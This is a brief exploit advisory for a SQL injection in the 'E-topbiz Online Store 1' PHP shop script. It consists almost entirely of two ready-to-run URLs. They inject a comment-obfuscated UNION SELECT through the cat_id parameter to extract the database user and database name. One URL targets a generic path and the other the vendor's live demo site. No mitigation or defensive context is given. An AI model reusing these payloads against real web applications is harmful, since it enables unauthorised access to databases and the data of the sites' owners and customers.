> > ================================================================= > > ======== E-topbiz Online Store 1 Remote File Sql Injection ====== > > ================================================================= > > home of script : http://e-topbiz.com/ > > By: Stack > > ====Vulnerable Demo and Exploit ==== > > > > PoC URL : > > http://site.il/path/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/* > > > > Demo URL : > > http://e-topbiz.com/trafficdemos/store1/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/*